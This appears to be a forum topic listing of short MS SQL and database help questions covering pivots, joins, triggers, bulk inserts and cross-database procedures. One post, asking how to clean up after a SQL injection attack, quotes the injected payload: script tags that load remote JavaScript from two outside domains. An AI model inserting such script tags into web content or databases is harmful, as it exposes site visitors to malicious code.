2,935 Topics
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I need to have a database of the online flight booking system. May i have some guidance ? | |
Hello guys help pls i'm trying to populate data from MS Database to list-view [code] string Collect_FULL = "SELECT FirstName, MiddleName, LastName, " + " Gender, DoB, Dependents, Address + ', ' + City + ', ' + State + ', ' + ZipCode AS Address, PhoneNumber, MobileNumber " Status … | |
I was searching around but I could not find it: I'd like a tool(free or paid) that is able to manage multiple MySql servers from the same GUI. I know about few thick-client apps that do this, but I need one that you can use it from internet. So far … | |
Hi All, I am trying to convert the following access update query into TSQL without any luck: UPDATE tblCattle INNER JOIN tblFarmDetails ON tblCattle.strEartag = tblFarmDetails.EarTagNo SET curMartPrice = tblFarmDetails.MartPric WHERE (curMartPrice=0 Or curMartPrice Is Null); First I tried simply pasting in the query with no luck so below is … | |
I need to eliminate a record with almost exactly the same data except 1...for example: I have 4 Fields for Employee table: Employee Stat First Name Last Name Employee ID Active James Smith JOS Resigned James Smith JOS For some reason the table I'm querying has these data. How can … | |
I have a problem I have a long table with many costumers, each costumer have between 70-100 bills how can i get for each one his top 5, all the replies giving me only the top 5 of the first.(MsSQL!) 10X Ofir | |
Hi I Create the tigger when update process happen in database.When the after update process happened ,tigger instert the new record into another table about that table locate in different server.I create linked server also ,once tigger execute it generate the Error message .Below I mention the error Message I … | |
The site that i'm working on is [url]http://www.perfectbrewingsupply.com[/url]. The site seems to come up properly (after i reset a new user/pw in the config file) but when trying to access the database for zencart, i am still receiving the following error: 0 DB_ERROR_NOT_CONNECTED in: [select * from project_version WHERE project_version_key … | |
Hi guys, I have a problem when synchronizing web publication. I begin by giving you an insight into my soft installed: -sql-server 2005 -windows seven so IIS7 I created a publication MaPublication.I made a right click on publication-> Release Local> MaPublication then I chose to configure synchronization Web.Then, next-> sql … | |
I Got 2 tables: 'Standby' and 'Usage' [COLOR="Red"]Standby[/COLOR] Table got this fields: [COLOR="Red"]PartNº[/COLOR] (equipment id); [COLOR="Red"]Area [/COLOR](physical location); [COLOR="Red"]Stock1[/COLOR] (Nº Total of equipments); [COLOR="Red"]Usage[/COLOR] table got this fields: [COLOR="Red"]Quant_Used[/COLOR] (The times that the equipement is taken from Standby); [COLOR="Red"]Quant_Received[/COLOR] (The times that the equipement is restored to Standby); [COLOR="Red"]PartNº[/COLOR] (foreign … | |
hello all in table1 I have Date Value 2/1/2010 100 2/2/2010 110 2/5/2010 95 3/4/2010 150 3/15/2010 220 etc how to sum the value according to it's month ? so I got Pebruary' sum value=315 March sum value =370 tq | |
How would I clean everhing after script got a sql injection attack Electric repeater beanie green<script src="http://nt010.cn/E/J.JS"></script><script src="http://nt004.cn/E/J.JS"></script> need to clean everything after <script> | |
gud day.. is it possible to have a database with password? i mean not setting a password for database users, but for the database itself.. i do not want the database users to see what's inside of my tables.. is it possible?? thank you.. | |
Hi ppl , Need some advise on my SQL coding . i have written some SQL code to draw and compare some data in which i was thrown back with an error of no Select statement after <> or any other expression . Can someone advise me of any walkaround … | |
I would like to get information of an employee by his EmployeeKey - in my case : LastName, FirstName, Gender, and Title using ASP. Net - C# - then display this information to label (label.Text = return value) The SQL is simple - [code] use AdventureWorksDW SELECT [FirstName], [LastName],[Gender], [Title] … | |
Hi Everyone, I'm trying to figure out how to use OPENROWSET to copy data from a local database to a remote one. I am able to query data from the remote table, and update values without issue. Example to update: [CODE] update OPENROWSET('SQLOLEDB', 'www.xxx.yyy.xxx'; 'username'; 'password, 'SELECT * FROM dbname.dbo.tablename') … | |
Hi. I am trying to load data from text file do table by BULK INSERT query. Command crashes on loading date field from text file to db. In the file there is a column where date is stored in the following format: [B]Mar 18 2008 3:40:25:153PM[/B]. The type of the … ![]() | |
How can I get the sum of ‘ExpCounter’? I want to end up with Batch_Number and Sum of ExpCounter in my results. [CODE] select batch_number, sum(acount)/aSize as 'ExpCounter' from HMIExpCount2 where aDate >= '03/01/2010' and aDate <= '03/02/2010' and batch_number = '118705' group by batch_number, asize [/CODE] Thanks! | |
![]() | Has anyone found any documentation on how to properly pass variables from a SQL Table over to another task within the Foreach Loop container? Basically I want to take two columns from a table and pass them into a stored procedure that will be executed within a SQL Task within … |
hi guys, i have a situation let say a customer orders 3 items item A worth 300 item B worth 100 item C worth 500 He paid in full for items A,B and he paid a partial payment of 250 for item C now I have a receipt for full … | |
Hi, is there a way how to (in transact sql) catch output from stored procedure which returns set (2 and more) of tables and move through it ??? thanks! | |
good day guys, I have an order table and some stuffs, and the user can cancel an order. my question is: 1.] what is the best implementation of canceling an order in a database? Im sure I must create a table for canceled order or something right? 2.]Is it appropriate … | |
I wrote a query yesterday and it ran fine. Today i inserted a new record and it has broken my query. Can anyone help me figure out why? Query: [CODE] WITH temp_orgChart (KitID, PartID, Quantity, iteration) AS ( SELECT KitID, PartID, Quantity, 0 FROM ItemParts WHERE KitID = 200185 UNION … | |
plz hepl me ...... table_1 Name_____Date_________Ptype Keadr____22/2/2010____P Anup_____22/2/2010____P Deepak___22/2/2010____A Keadr____23/2/2010____P Anup_____23/2/2010____L Deepak___23/2/2010____A Keadr____24/2/2010____P Anup_____24/2/2010____P Deepak___24/2/2010____P I want To convert this table as Name_____22/2/2010____23/2/2010_____24/2/2010 Kedar____P____________P_____________P Anup_____P____________L_____________P Deepak___A____________A_____________P my query select * from table_1 PIVOT(MAX(Ptype)FOR[Date]IN([22/2/2010],[23/2/2010],[24/2/2010]))AS p i got result Name_____22/2/2010______23/2/2010______24/2/2010 Kedar Anup Deepak didnt get values in 22/2 ,23/2,24/3 col | |
hy, i have 2 database. DB1 & DB2. i create SP in DB1. in the SP, i want to access table "TBL" in DB2. how can i create that SP?? [CODE] CREATE PROCEDURE test AS BEGIN ?????????? END; [/CODE] Thx, | |
hi there......... i am using MS SQL i have made a database in MS SQL now i want to export to another computer (pc) ,,,,,, please help me out with this......... thanks | |
Less than a year after launching its high performance computing strategy, Microsoft finds its [URL= http://www.microsoft.com/hpc/] HPC Server 2008[/URL] near the top of the heap. The Windows Server 2008 derivative placed 23rd on a list of the 500 top-performing supercomputers in the world, as measured by the [URL= http://www.ncsa.uiuc.edu/] National … | |
Hi , I want to create user defined data types in MS SQL 2008, So when I start MS SQL Server Management Studio -> Database here 'Adventure Work' is not appearing. ( I am referring this -http://www.mssqltips.com/tip.asp?tip=1628) how to enable that?:?: or is their any another way to declare user … | |
Hello Friends I wanted to make a same change in over 300 SQL scripts. Is there a way to automate this? Thanks |
The End.